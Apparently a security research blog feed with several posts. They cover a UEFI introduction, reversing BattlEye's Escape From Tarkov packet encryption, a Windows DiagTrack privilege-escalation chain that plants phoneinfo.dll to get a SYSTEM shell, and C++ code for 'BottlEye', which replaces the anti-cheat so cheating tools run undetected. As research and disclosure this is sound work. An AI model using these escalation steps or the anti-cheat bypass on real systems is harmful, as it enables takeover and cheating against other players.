Sometimes one may want to redirect certain OS kernel initialization procedures or even fully prevent them from running. This is not possible to do with a boot-time driver. Why is this the case? Well, a large part of kernel initialization happens before any drivers are loaded, so any modifications will not be possible after this point in the presence of Kernel Patch Protection (PatchGuard). Another reason is the issue of Driver Signature Enforcement (DSE): Microsoft requires that loaded drivers on Windows must be signed with a valid kernel mode signing certificate, unless test signing mode is enabled.

An example of a UEFI project that modifies Windows kernel initialization procedures is EfiGuard. This UEFI driver patches certain parts of the Windows boot loader and kernel at boot time, and can effectively disable PatchGuard and optionally DSE.

3) Develop low level system knowledge

Another reason for developing UEFI software could be to increase your understanding of the system at a low level. Being able to follow the initialization process of the system allows for a much more in-depth look at how operating systems themselves work. Additionally, the ability to build OS independent drivers, as well as work with a sophisticated toolset giving you full control over a system is something that may be of interest to many people.

UEFI boot phases

UEFI has six main boot phases, which are all critical in the initialization process of the platform. The combined phases are referred to as the Platform Initialization or PI. Hopefully the brief descriptions of each stage below will give you a basic understanding of this process. Our series will focus primarily on the DXE and RT phases, as these are probably the two main areas of interest for people getting started with UEFI.

Security (SEC)

This phase is the primary stage of the UEFI boot process, and will generally be used to: initialize a temporary memory store, act as the root of trust in the system and provide information to the Pre-EFI core phase. This root of trust is a mechanism that ensures any code that is executed in the PI is cryptographically validated (digitally signed), creating a “secure boot” environment.

Pre-EFI Initialization (PEI)

This is the second stage of the boot process and involves using only the CPU’s current resources to dispatch Pre-EFI Initialization Modules (PEIMs). These are used to perform initialization of specific boot-critical operations such as memory initialization, whilst also allowing control to pass to the Driver Execution Environment (DXE).

Driver Execution Environment (DXE)

The DXE phase is where the majority of the system initialization occurs. In the PEI stage, the memory required for the DXE to operate is allocated and initialized, and upon control being passed to the DXE, the DXE Dispatcher is then invoked. The dispatcher will perform the loading and execution of hardware drivers, runtime services, and any boot services required for the operating system to start.

Boot Device Selection (BDS)

Upon completion of the DXE Dispatcher executing all DXE drivers, control is passed to the BDS. This stage is responsible for initializing console devices and any remaining devices that are required. The selected boot entry is then loaded and executed in preparation for the Transient System Load (TSL).

Transient System Load (TSL)

In this phase, the PI process is now directly between the boot selection and the expected hand-off to the main operating system phase. Here, an application such as the UEFI shell may be invoked, or (more commonly) a boot loader will run in order to prepare the final OS environment. The boot loader is usually responsible for terminating the UEFI Boot Services via the ExitBootServices() call. However, it is also possible for the OS itself to do this, such as the Linux kernel with CONFIG_EFI_STUB.

Runtime (RT)

The final phase is the runtime one. Here is where the final handoff to the OS occurs. The UEFI compatible OS now takes over the system. The UEFI runtime services remain available for the OS to use, such as for querying and writing variables from NVRAM.

The SMM (System Management Mode) exists separately from the runtime phase and may also be entered during this phase when an SMI is dispatched. We will not be covering the SMM in this introduction.

Getting started with developing UEFI software

In this section we will be providing you with a list of the most essential tools to help you begin your development journey with UEFI. When it comes to the question of “where to begin?”, there aren’t many resources easily accessible, so here is a shortlist of the development tools we recommend:

- EDK2

First and foremost is the EDK2 project, which is described as “a modern, feature-rich, cross-platform firmware development environment for the UEFI and PI specifications from []” The EDK2 project is developed and maintained (together with community volunteers) by many of the same parties that contribute to the UEFI specification.

This is extremely helpful as EDK2 is guaranteed to contain the latest UEFI protocols (assuming you are using the master branch). In addition to this, there are countless high-quality projects for you to use as a guide. One example is the Open Virtual Machine Firmware (OVMF). This is a project that is aimed at providing UEFI support for virtual machines and it is very well documented.

One major downside to EDK2 is the process of setting up the build environment for the first time - it is a long and arduous process, and even with their Getting started with EDK2 guide to make it as simple as possible, it can still be confusing for newcomers.

- VisualUefi

The VisualUefi project is aimed at allowing EDK2 development inside Visual Studio. We would recommend you to begin your development by using the build tools from EDK2 command line over this project, to allow you to become comfortable with the platform.

Furthermore, VisualUefi offers headers and libraries that are a subset of the complete EDK2 libraries, and so you may find that not everything you require is easily accessible. It is, however, much easier to set up in comparison to EDK2, and is therefore often favored by avid Visual Studio users.

- Debugging

In regards to debugging, there are a few options available to you, each with their pros and cons. These will be listed below, and it is up to you which you favor the most. In part 2 of this series we will be showing you how to debug an example driver, so until then you may want to install all of these (or none!) to help you make an informed decision:

  1. QEMU - a multiplatform emulator (though best on Linux) that provides the best debugging facilities due to being an emulator rather than a VM. It is quite complex to set up, and concerning its counterparts, it is also quite slow.
  2. VirtualBox - a good multiplatform solution, with the exception of it suffering from memory loss due to pretty lackluster non-volatile RAM (NVRAM) emulation.
  3. VMware - offers good performance with correctly working NVRAM emulation. If the guest and host are both Windows, it works very well with WinDbg for debugging the TSL and RT phases.

Final words

In this article we have covered a couple of different introductory topics to help you get a basic understanding of what UEFI is. We would expect you to hopefully have some extra questions regarding this topic, and we are more than happy to answer them for you. Part 2 of this series will be more technical, however it will be explained thoroughly to the best of our abilities to make it as simple to follow as possible. We will be providing code for a simple DXE driver built with EDK2, and will show examples of basic console input and output, writing to a serial port, and debugging the driver with QEMU.

Thank you very much for reading this far, and we look forward to continuing this series in the coming weeks!

Cracking BattlEye packet encryption

Recently, Battlestate Games, the developers of Escape From Tarkov, hired BattlEye to implement encryption on networked packets so that cheaters can’t capture these packets, parse them and use them for their advantage in the form of radar cheats, or otherwise. Today we’ll go into detail about how we broke their encryption in a few hours.

Analysis of EFT

We started first by analyzing Escape From Tarkov itself. The game uses Unity Engine, which uses C#, an intermediate langauge, which means you can very easily view the source code behind the game by opening it in tools like ILDasm or dnSpy. Our tool of choice for this analysis was dnSpy.

Unity Engine, if not under the IL2CPP option, generates game files and places them under GAME_NAME_Data\Managed, in this case it’s EscapeFromTarkov_Data\Managed. This folder contains all the dependencies that the engine uses, including the file that contains the game’s code which is Assembly-CSharp.dll, we loaded this file in dnSpy then searched for the string encryption, which landed us here:

This segment is in a class called EFT.ChannelCombined, which is the class that handles networking as you can tell by the arguments passed to it:

Right clicking on channelCombined.bool_2, which is the variable they log as an indicator for whether encryption was enabled or not, then clicking Analyze, shows us that it’s referenced by 2 methods:

The second of which is the one we’re currently in, so by double clicking on the first one, it lands on this:

Voila! There’s our call into BEClient.EncryptPacket, when you click on that method it’ll take you to the BEClient class, which we can then dissect and find a method called DecryptServerPacket, this method calls into a function in BEClient_x64.dll called pfnDecryptServerPacket that will decrypt the data into a user-allocated buffer and write the size of the decrypted buffer into a pointer supplied by the caller.

pfnDecryptServerPacket is not exported by BattlEye, nor is it calculated by EFT, it’s actually supplied by BattlEye’s initializer once called by the game. We managed to calculate the RVA (Relative Virtual Address) by loading BattlEye into a process of our own, and replicating how the game initializes it.

The code for this program is available here.

Analysis of BattlEye

As we’ve deduced from the last section, EFT calls into BattlEye to do all its cryptography needs. So now it’s a matter of reversing native code rather than IL, which is significantly harder.

BattlEye uses a protector called VMProtect, which virtualizes and mutates segments specified by the developer. To properly reverse a binary protected by this obfuscator, you’ll need to unpack it.

Unpacking is as simple as dumping the image at runtime; we did this by loading it into a local process then using Scylla to dump it’s memory to disk.

Opening this file in IDA, then going to the DecryptServerPacket routine will lead us to a function that looks like this:

This is what’s called a vmentry, which pushes a vmkey on the stack then calls into a vminit which is the handler for the virtual machine.

Here is the tricky part: the instructions in this function are only understandable by the program itself due to them being “virtualized” by VMProtect.

Luckily for us, fellow Secret Club member can1357 made a tool that completely breaks this protection, which you can find at VTIL.

Figuring the algorithm

The file produced by VTIL reduced the function from 12195 instructions down to 265, which simplified the project massively. Some VMProtect routines were present in the disassembly, but these are easily recognized and can be ignored, the encryption begins from here:

Equivalent in pseudo-C:

uint32_t flag_check = *(uint32_t*)(image_base + 0x4f8ac);

if (flag_check != 0x1b)
	goto 0x20e445;
	goto 0x20e52b;

VTIL uses its own instruction set, I translated this to psuedo-C to simplify it further.

We analyze this routine by going into 0x20e445, which is a jump to 0x1a0a4a, at the very start of this function they move sr12 which is a copy of rcx (the first argument on the default x64 calling convention), and store it on the stack at [rsp+0x68], and the xor key at [rsp+0x58].

This routine then jumps to 0x1196fd, which is:

Equivalent in pseudo-C:

uint32_t xor_key_1 = *(uint32_t*)(packet_data + 3) ^ xor_key;
(void(*)(uint8_t*, size_t, uint32_t))(0x3dccb7)(packet_data, packet_len, xor_key_1);

Note that rsi is rcx, and sr47 is a copy of rdx. Since this is x64, they are calling 0x3dccb7 with arguments in this order: (rcx, rdx, r8). Lucky for us vxcallq in VTIL means call into function, pause virtual exectuion then return into virtual machine, so 0x3dccb7 is not a virtualized function!

Going into that function in IDA and pressing F5 will bring up pseudo-code generated by the decompiler:

This code looks incomprehensible with some random inlined assembly that has no meaning at all. Once we nop these instructions out, change some var types, then hit F5 again the code starts to look much better:

This function decrypts the packet in 4-byte blocks non-contiguously starting from the 8th byte using a rolling XOR key.

Once we continue looking at the assembly we figure that it calls into another routine here:

Equivalent in x64 assembly:

mov t225, dword ptr [rsi+0x3]
mov t231, byte ptr [rbx]
add t231, 0xff ; uhoh, overflow

; the following is psuedo
mov [$flags], t231 u< rbx:8

not t231

movsx t230, t231
mov [$flags+6], t230 == 0
mov [$flags+7], t230 < 0

movsx t234, rbx
mov [$flags+11], t234 < 0
mov t236, t234 < 1
mov t235, [$flags+11] != t236

and [$flags+11], t235

mov rdx, sr46 ; sr46=rdx
mov r9, r8

sbb eax, eax ; this will result in the CF (carry flag) being written to EAX

mov r8, t225
mov t244, rax
and t244, 0x11 ; the value of t244 will be determined by the sbb from above, it'll be either -1 or 0 
shr r8, t244 ; if the value of this shift is a 0, that means nothing will happen to the data, otherwise it'll shift it to the right by 0x11

mov rcx, rsi
mov [rsp+0x20], r9
mov [rsp+0x28], [rsp+0x68]

call 0x3dce60

Before we continue dissecting the function it calls, we have to come to the conclusion that the shift is meaningless due to the carry flag not being set, resulting in a 0 return value from the sbb instruction, which means we’re on the wrong path.

If we look for references to the first routine 0x1196fd, we’ll see that it’s actually referenced again, this time with a different key!

That means the first key was actually a red herring, and the second key is most likely the correct one. Nice one Bastian!

Now that we’ve figured out the real xor key and the arguments to 0x3dce60, which are in the order: (rcx, rdx, r8, r9, rsp+0x20, rsp+0x28).

We go to that function in IDA, hit F5 and it’s very readable:

We know the order of the arguments, their type and their meaning, the only thing left is to translate this to actual code, which we’ve done nicely and wrapped into a gist available here.


This encryption wasn’t the hardest to reverse engineer, and our efforts were certainly noticed by BattlEye; after 3 days, the encryption was changed to a TLS-like model, where RSA is used to securely exchange AES keys. This makes MITM without reading process memory by all intents and purposes infeasible.

Windows Telemetry service elevation of privilege

By: Jonas L
1 July 2020 at 23:00

Today, we will be looking at the “Connected User Experiences and Telemetry service,” also known as “diagtrack.” This article is quite heavy on NTFS-related terminology, so you’ll need to have a good understanding of it.

A feature known as “Advanced Diagnostics” in the Feedback Hub caught my interest. It is triggerable by all users and causes file activity in C:\Windows\Temp, a directory that is writeable for all users.

Reverse engineering the functionality and duplicating the needed interactions was quite a challenge as it used WinRT IPC instead of COM and I did not know WinRT existed, so I had some catching up to do.

In C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.2003.1312.0_x64__8wekyb3d8bbwe\Helper.dll, I found a function with surprising possibilities:

WINRT_IMPL_AUTO(void) StartCustomTrace(param::hstring const& customTraceProfile) const;

This function will execute a WindowsPerformanceRecorder profile defined in an XML file specified as an argument in the security context of the Diagtrack Service.

The file path is parsed relative to the System32 folder, so I dropped an XML file in the writeable-for-all directory System32\Spool\Drivers\Color and passed that file path relative to the system directory aforementioned and voila - a trace recording was started by Diagtrack!

If we look at a minimal WindowsPerformanceRecorder profile we’d see something like this:

<WindowsPerformanceRecorder Version="1">
  <SystemCollector Id="SystemCollector">
   <BufferSize Value="256" />
   <Buffers Value="4" PercentageOfTotalMemory="true" MaximumBufferSpace="128" />
  <EventCollector Id="EventCollector_DiagTrack_1e6a" Name="DiagTrack_1e6a_0">
   <BufferSize Value="256" />
   <Buffers Value="0.9" PercentageOfTotalMemory="true" MaximumBufferSpace="4" />
   <SystemProvider Id="SystemProvider" /> 
  <Profile Id="Performance_Desktop.Verbose.Memory" Name="Performance_Desktop"
     Description="exploit" LoggingMode="File" DetailLevel="Verbose">
    <SystemCollectorId Value="SystemCollector">
     <SystemProviderId Value="SystemProvider" />
    <EventCollectorId Value="EventCollector_DiagTrack_1e6a">
      <EventProviderId Value="EventProvider_d1d93ef7" />

Information Disclosure

Having full control of the file opens some possibilities. The name attribute of the EventCollector element is used to create the filename of the recorded trace. The file path becomes:

C:\Windows\Temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_DiagTrack_XXXXXX.etl (where XXXXXX is the value of the name attribute.)

Full control over the filename and path is easily gained by setting the name to: \..\..\file.txt: which becomes the below:


This results in C:\Windows\Temp\file.txt being used.

The recorded traces are opened by SYSTEM with FILE_OVERWRITE_IF as disposition, so it is possible to overwrite any file writeable by SYSTEM. The creation of files and directories (by appending ::$INDEX_ALLOCATION) in locations writeable by SYSTEM is also possible.

The ability to select any ETW provider for traces executed by the service is also interesting from an information disclosure point of view.

One scenario where I could see myself using the data is when you don’t know a filename because a service creates a file in a folder where you do not have permission to list the files.

Such filenames can get leaked by Microsoft-Windows-Kernel-File provider as shown in this snippet from an etl file recorded by adding 22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716 to the WindowsPerformanceRecorder profile file.

 <Data Name="Irp">0xFFFF81828C6AC858</Data>
 <Data Name="FileObject">0xFFFF81828C85E760</Data>
 <Data Name="IssuingThreadId">  10096</Data>
 <Data Name="CreateOptions">0x1000020</Data>
 <Data Name="CreateAttributes">0x0</Data>
 <Data Name="ShareAccess">0x3</Data>
 <Data Name="FileName">\Device\HarddiskVolume2\Users\jonas\OneDrive\Dokumenter\FeedbackHub\DiagnosticLogs\Install and Update-Post-update app experience\2019-12-13T05.42.15-SingleEscalations_132206860759206518\file_14_ProgramData_USOShared_Logs__</Data>

Such leakage can yield exploitation possibility from seemingly unexploitable scenarios.

Other security bypassing providers:

  • Microsoft-Windows-USB-UCX {36DA592D-E43A-4E28-AF6F-4BC57C5A11E8}
  • Microsoft-Windows-USB-USBPORT {C88A4EF5-D048-4013-9408-E04B7DB2814A} (Raw USB data is captured, enabling keyboard logging)
  • Microsoft-Windows-WinINet {43D1A55C-76D6-4F7E-995C-64C711E5CAFE}
  • Microsoft-Windows-WinINet-Capture {A70FF94F-570B-4979-BA5C-E59C9FEAB61B} (Raw HTTP traffic from iexplore, Microsoft Store, etc. is captured - SSL streams get captured pre-encryption.)
  • Microsoft-PEF-WFP-MessageProvider (IPSEC VPN data pre encryption)

Code Execution

Enough about information disclosure, how do we turn this into code execution?

The ability to control the destination of .etl files will most likely not lead to code execution easily; finding another entry point is probably necessary. The limited control over the files content makes exploitation very hard; perhaps crafting an executable PowerShell script or bat file is plausible, but then there is the problem of getting those executed.

Instead, I chose to combine my active trace recording with a call to:

WINRT_IMPL_AUTO(Windows::Foundation::IAsyncAction) SnapCustomTraceAsync(param::hstring const& outputDirectory)

When supplying an outputDirectory value located inside %WINDIR%\temp\DiagTrack_alternativeTrace (Where the .etl files of my running trace are saved) an interesting behavior emerges.

The Diagtrack Service will rename all the created .etl files in DiagTrack_alternativeTrace to the directory given as the outputDirectory argument to SnapCustomTraceAsync. This allows destination control to be acquired because rename operations that occur where the source file gets created in a folder that grants non-privileged users write access are exploitable. This is due to the permission inheritance of files and their parent directories. When a file is moved by a rename operation, the DACL does not change. What this means is that if we can make the destination become %WINDIR%\System32, and somehow move the file then we will still have write permission to the file. So, we know we control the outputDirectory argument of SnapCustomTraceAsync, but some limitations exist.

If the chosen outputDirectory is not a child of %WINDIR%\temp\DiagTrack_alternativeTrace, the rename will not happen. The outputDirectory cannot exist because the Diagtrack Service has to create it. When created, it is created with SYSTEM as its owner; only the READ permission is granted to users.

This is problematic as we cannot make the directory into a mount point. Even if we had the required permissions, we would be stopped by not being able to empty the directory because Diagtrack has placed the snapshot output etl file inside it. Lucky for us, we can circumvent these obstacles by creating two levels of indirection between the outputDirectory destination and DiagTrack_alternativeTrace.

By creating the folder DiagTrack_alternativeTrace\extra\indirections and supplying %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as the outputDirectory we allow Diagtrack to create the snap folder with its limited permissions, as we are inside DiagTrack_alternativeTrace. With this, we can rename the extra folder, as it is created by us. The two levels of indirection is necessary to bypass the locking of the directory due to Diagtrack having open files inside the directory. When extra is renamed, we can recreate %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap (which is now empty) and we have full permissions to it as we are the owner!

Now, we can turn DiagTrack_alternativeTrace\extra\indirections\snap into a mount point targeted at %WINDIR%\system32 and Diagtrack will move all files matching WPR_initiated_DiagTrack*.etl* into %WINDIR%\system32. The files will still be writeable as they were created in a folder that granted users permission to WRITE. Unfortunately, having full control over a file in System32 is not quite enough for code execution… that is, unless we have a way of executing user controllable filenames - like the DiagnosticHub plugin method popularized by James Forshaw. There’s a caveat though, DiagnosticHub now requires any DLL it loads to be signed by Microsoft, but we do have some ways to execute a DLL file in system32 under SYSTEM security context - if the filename is something specific. Another snag though is that the filename is not controllable. So, how can we take control?

If instead of making the mountpoint target System32, we target an Object Directory in the NT namespace and create a symbolic link with the same name as the rename destination file, we gain control over the filename. The target of the symbolic link will become the rename operations destination. For instance, setting it to\??\%WINDIR%\system32\phoneinfo.dll results in write permission to a file the Error Reporting service will load and execute when an error report is submitted out of process. For my mountpoint target I chose \RPC Control as it allows all users to create symbolic links inside.

Let’s try it!

When Diagtrack should have done the rename, nothing happened. This is because, before the rename operation is done, the destination folder is opened, but now is an object directory. This means it’s unable to be opened by the file/directory API calls. This can be circumvented by timing the creation of the mount point to be after the opening of the folder, but before the rename. Normally in such situations, I create a file in the destination folder with the same name as the rename destination file. Then I put an oplock on the file, and when the lock breaks I know the folder check is done and the rename operation is about to begin. Before I release the lock I move the file to another folder and set the mount point on the now empty folder. That trick would not work this time though as the rename operation was configured to not overwrite an already existing file. This also means the rename would abort because of the existing file - without triggering the oplock.

On the verge of giving up I realized something:

If I make the junction point switch target between a benign folder and the object directory every millisecond there is 50% chance of getting the benign directory when the folder check is done and 50% chance of getting the object directory when the rename happens. That gives 25% chance for a rename to validate the check but end up as phoneinfo.dll in System32. I try avoiding race conditions if possible, but in this situation there did not appear to be any other ways forward and I could compensate for the chance of failure by repeating the process. To adjust for the probability of failure I decided to trigger an arbitrary number of renames, and fortunately for us, there’s a detail about the flow that made it possible to trigger as many renames I wanted in the same recording. The renames are not linked to files the diagnostic service knows it has created, so the only requirement is that they are in %WINDIR%\temp\DiagTrack_alternativeTrace and match WPR_initiated_DiagTrack*.etl*

Since we have permission to create files in the target folder, we can now create WPR_initiated_DiagTrack0.etl, WPR_initiated_DiagTrack1.etl, etc. and they will all get renamed!

As the goal is one of the files ending up as phoneinfo.dll in System32, why not just create the files as hard links to the intended payload? This way there is no need to use the WRITE permission to overwrite the file after the move.

After some experimentation I came to the following solution:

  1. Create the folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections
  2. Start diagnostic trace

    • %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrackAlternativeLogger_WPR System Collector.etl is created
  3. Create %WINDIR%\temp\DiagTrack_alternativeTrace\WPR_initiated_DiagTrack[0-100].etl as hardlinks to the payload.
  4. Create symbolic links \RPC Control\WPR_initiated_DiagTrack[0-100.]etl targeting %WINDIR%\system32\phoneinfo.dll
  5. Make OPLOCK on WPR_initiated_DiagTrack100.etl; when broken, check if %WINDIR%\system32\phoneinfo.dll exists. If not, repeat creation of WPR_initiated_DiagTrack[].etl files and matching symbolic links.
  6. Make OPLOCK on on WPR_initiated_DiagTrack0.etl; when it is broken, we know that the rename flow has begun but the first rename operation has not happened yet.

Upon breakage:

  1. rename %WINDIR%\temp\DiagTrack_alternativeTrace\extra to %WINDIR%\temp\DiagTrack_alternativeTrace\{RANDOM-GUID}
  2. Create folders %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap
  3. Start thread that in a loop switches %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap between being a mountpoint targeting %WINDIR%\temp\DiagTrack_alternativeTrace\extra and \RPC Control in NT object namespace.
  4. Start snapshot trace with %WINDIR%\temp\DiagTrack_alternativeTrace\extra\indirections\snap as outputDirectory

Upon execution, 100 files will get renamed. If none of them becomes phoneinfo.dll in system32, it will repeat until success.

I then added a check for the existence of %WINDIR%\system32\phoneinfo.dll in the thread that switches the junction point. The increased delay between switching appeared to increase the chance of one of the renames creating phoneinfo.dll. Testing shows the loop ends by the end of the first 100 iterations.

Upon detection of %WINDIR%\system32\phoneinfo.dll, a blank error report is submitted to Windows Error Reporting service, configured to be submitted out of proc, causing wermgmr.exe to load the just created phoneinfo.dll in SYSTEM security context.

The payload is a DLL that upon DLL_PROCESS_ATTACH will check for SeImpersonatePrivilege and, if enabled, cmd.exe will get spawned on the current active desktop. Without the privileged check, additional command prompts would spawn since phoneinfo.dll is also attempted to be loaded by the process that initiates the error reporting.

In addition, a message is shown using WTSSendMessage so we get an indicator of success even if the command prompt cannot be spawned in the correct session/desktop.

The red color is because my command prompts auto execute echo test> C:\windows:stream && color 4E; that makes all UAC elevated command prompts’ background color RED as an indicator to me.

Though my example on the repository contains private libraries, it may still be beneficial to get a general overview of how it works.

BattlEye client emulation

By: vmcall
6 July 2020 at 23:00

The popular anti-cheat BattlEye is widely used by modern online games such as Escape from Tarkov and is considered an industry standard anti-cheat by many. In this article I will demonstrate a method I have been utilizing for the past year, which enables you to play any BattlEye-protected game online without even having to install BattlEye.

BattlEye initialisation

BattlEye is dynamically loaded by the respective game on startup to initialize the software service (“BEService”) and kernel driver (“BEDaisy”). These two components are critical in ensuring the integrity of the game, but the most critical component by far is the usermode library (“BEClient”) that the game interacts with directly. This module exports two functions: GetVer and more importantly Init.

The Init routine is what the game will call, but this functionality has never been documented before, as people mostly focus on BEDaisy or their shellcode. Most important routines in BEClient, including Init, are protected and virtualised by VMProtect, which we are able to devirtualise and reverse engineer thanks to vtil by secret club member Can Boluk, but the inner workings of BEClient is a topic for a later part of this series, so here is a quick summary.

Init and its arguments have the following definitions:

// BEClient_x64!Init
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data);
enum instance_status

struct becl_game_data
    char*         game_version;
    std::uint32_t address;
    std::uint16_t port;

    using print_message_t = void(*)(char* message);
    print_message_t print_message;

    using request_restart_t = void(*)(std::uint32_t reason);
    request_restart_t request_restart;

    using send_packet_t = void(*)(void* packet, std::uint32_t length);
    send_packet_t send_packet;

    using disconnect_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length, char* reason);
    disconnect_peer_t disconnect_peer;

struct becl_be_data
    using exit_t = bool(*)();
    exit_t exit;

    using run_t = void(*)();
    run_t run;

    using command_t = void(*)(char* command);
    command_t command;

    using received_packet_t = void(*)(std::uint8_t* received_packet, std::uint32_t length);
    received_packet_t received_packet;

    using on_receive_auth_ticket_t = void(*)(std::uint8_t* ticket, std::uint32_t length);
    on_receive_auth_ticket_t on_receive_auth_ticket;

    using add_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    add_peer_t add_peer;

    using remove_peer_t = void(*)(std::uint8_t* guid, std::uint32_t guid_length);
    remove_peer_t remove_peer;

As seen, these are quite simple containers for interopability between the game and BEClient. becl_game_data is defined by the game and contains functions that BEClient needs to call (for example, send_packet) while becl_be_data is defined by BEClient and contains callbacks used by the game after initialisation (for example, received_packet). Note that these two structures slightly differ in some games that have special functionality, such as the recently introduced packet encryption in Escape from Tarkov that we’ve already cracked. Older versions of BattlEye (DayZ, Arma, etc.) use a completely different approach with function pointer swap hooks to intercept traffic communication, and therefore these structures don’t apply.

A simple Init implementation would look like this:

// BEClient_x64!Init
battleye::instance_status Init(std::uint64_t integration_version,
                               battleye::becl_game_data* game_data,
                               battleye::becl_be_data* client_data)
    battleye::delegate::o_send_packet    = game_data->send_packet;

    client_data->exit                   = battleye::delegate::exit;
    client_data->run                    = battleye::delegate::run;
    client_data->command                = battleye::delegate::command;
    client_data->received_packet        = battleye::delegate::received_packet;
    client_data->on_receive_auth_ticket = battleye::delegate::on_receive_auth_ticket;
    client_data->add_peer               = battleye::delegate::add_peer;
    client_data->remove_peer            = battleye::delegate::remove_peer;

    return battleye::instance_status::SUCCESSFULLY_INITIALIZED;

This would allow our custom BattlEye client to receive packets sent from the game server’s BEServer module.

Packet handling

The function received_packet is by far the most important routine used by the game, as it handles incoming packets from the BattlEye server component. BattlEye communication is extremely simple compared to how important the integrity of it is. In recent versions of BattlEye, packets follow the same general structure:

#pragma pack(push, 1)
struct be_fragment
    std::uint8_t count;
    std::uint8_t index;

struct be_packet_header
    std::uint8_t id;
    std::uint8_t sequence;

struct be_packet : be_packet_header
        be_fragment fragment;

            std::uint8_t no_fragmentation_flag;
            std::uint8_t body[0];
    inline bool fragmented()
        return this->fragment.count != 0x00;
#pragma pack(pop)

All packets have an identifier and a sequence number (which is used by the requests/response communication and the heartbeat). Requests and responses have a fragmentation mode which allows BEServer and BEClient to send packets in chunks of 0x400 bytes (seemingly arbitrary) instead of sending one big packet.

In the current iteration of BattlEye, the following packets are used for communication:

INIT (00)

This packet is sent to the BEClient module as soon as the connection with the game server has been established. This packet is only transmitted once, contains no data besides the packet id 00 and the response to this packet is simply 00 05.

START (‘02’)

This packet is sent right after the ‘INIT’ packets have been exchanged, and contains the server-generated guid of the client. The response of this packet is simply the header: 02 00


This type of packet is sent from BEServer to BEClient to request (and in rare cases, simply transmit) data, and BEClient will send back data for that request using the RESPONSE packet type.

The first request contains crucial information such as service- and integration version, not responding to it will get you disconnected by the game server. Afterwards, requests are game specific.


This type of packet is used by the BEServer module to ensure that the connection hasn’t been dropped. It is sent every 30 seconds using a sequential index, and if the client doesn’t respond with the same packet, the client is disconnected from the game server. This heartbeat packet is only three bytes long, with the sequential index used for synchronization being incremental and therefore easily emulated. An example heartbeat could be: 09 01 00, which is the second heartbeat (sequence starts at zero) transmitted.


With this knowledge, it is possible by emulating the entire BattlEye anti-cheat with only two proprietary points of data: the responses for request sequence one and two. These can be intercepted using a tool such as wireshark and replayed as many times as you want for the respective game, because the packet encryption used by BattlEye is static and contextless.

Emulating the INIT packet is as stated simply responding with the sequence number five:

case battleye::packet_id::INIT:
    auto info_packet = battleye::be_packet{};       = battleye::packet_id::INIT;
    info_packet.sequence = 0x05;

    battleye::delegate::o_send_packet(&info_packet, sizeof(info_packet));

Emulating the START packet is done by replying with the received packet’s header:

case battleye::packet_id::START:
    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));

Emulating the HEARTBEAT packets is done by replying with the received packet:

case battleye::packet_id::HEARTBEAT:    
    battleye::delegate::o_send_packet(received_packet, length);

Emulating the REQUEST packets can be done by replaying previously generated responses, which can be logged with code hooks or man-in-the-middle software. These packets are game specific and some games might disconnect you for not handling a specific request, but most games only require the first two requests to be handled, afterwards simply replying with the packet header is enough to not get disconnected by the game server. It is important to notice that all REQUEST packets are immediately responded to with the header, to let the server know that the client is aware of the request. This is how BottlEye emulates them:

case battleye::packet_id::REQUEST:
    const auto respond = 
        !header->fragmented() || 
        (header->fragment.index == header->fragment.count - 1);

    if (!respond)

    battleye::delegate::o_send_packet(received_packet, sizeof(battleye::be_packet_header));

    switch (header->sequence)
    case 0x01:
                // REDACTED BUFFER
    case 0x02:
                // REDACTED BUFFER

Which uses the following helper function for responses:

void battleye::delegate::respond(
    std::uint8_t response_index, 
    std::initializer_list<std::uint8_t> data)

    const auto size = sizeof(battleye::be_packet_header) + 
                      sizeof(battleye::be_fragment::count) + 

    auto packet = std::make_unique<std::uint8_t[]>(size);
    auto packet_buffer = packet.get();

    packet_buffer[0] = (battleye::packet_id::RESPONSE); // PACKET ID
    packet_buffer[1] = (response_index - 1);            // RESPONSE INDEX
    packet_buffer[2] = (0x00);                          // FRAGMENTATION DISABLED

    for (size_t i = 0; i < data.size(); i++)
        packet_buffer[3 + i] = data.begin()[i];

    battleye::delegate::o_send_packet(packet_buffer, size);


The full BottlEye project can be found on our GitHub repository. Below you can see this specific project being used in various popular video games.


The following video contains a live demonstration of my BottlEye project being used in the BattlEye-protected game Fortnite. In the video I live debug fortnite while playing online to prove that BattlEye is not loaded.


The following screenshot shows the BattlEye-protected game Insurgency running on Arch in Wine.

Escape from Tarkov

The following screenshot shows the usage of Cheat Engine in the popular, battleye-protected game Escape from Tarkov. This is possible because BattlEye has been replaced with BottlEye on disk.

Thanks to

  • Sabotage
  • Tamimego
  • Atex
  • namazso

Abusing MacOS Entitlements for code execution

By: impost0r
14 August 2020 at 23:00

Recently I disclosed some vulnerabilities to Dropbox and PortSwigger via H1 and Microsoft via MSRC pertaining to Application entitlements on MacOS. We’ll be exploring what entitlements are, what exactly you can do with them, and how they can be used to bypass security products.

These are all unpatched as of publish.

What’s an Entitlement?

On MacOS, an entitlement is a string that grants an Application specific permissions to perform specific tasks that may have an impact on the integrity of the system or user privacy. Entitlements can be viewed with the comand codesign -d --entitlements - $file.

Viewing the entitlements of the main Dropbox binary.

For the above image, we can see the key entitlements and - they allow exactly what they say on the tin. We’ll explore Dropbox first, as it’s the more involved of the two to exploit.


Just as Windows has PE and Linux has ELF, MacOS has its own executable format, Mach-O (short for Mach-Object). Mach-O files are used on all Apple products, ranging from iOS, to tvOS, to MacOS. In fact, all these operating systems share a common heritage stemming from NeXTStep, though that’s beyond the scope of this article.

MacOS has a variety of security protections in place, including Gatekeeper, AMFI (AppleMobileFileIntegrity), SIP (System Integrity Protection, a form of mandatory access control), code signing, etc. Gatekeeper is akin to Windows SmartScreen in that it fingerprints files, checks them against a list on Apple’s servers, and returns the value to determine if the file is safe to run. `

This is vastly simplified.

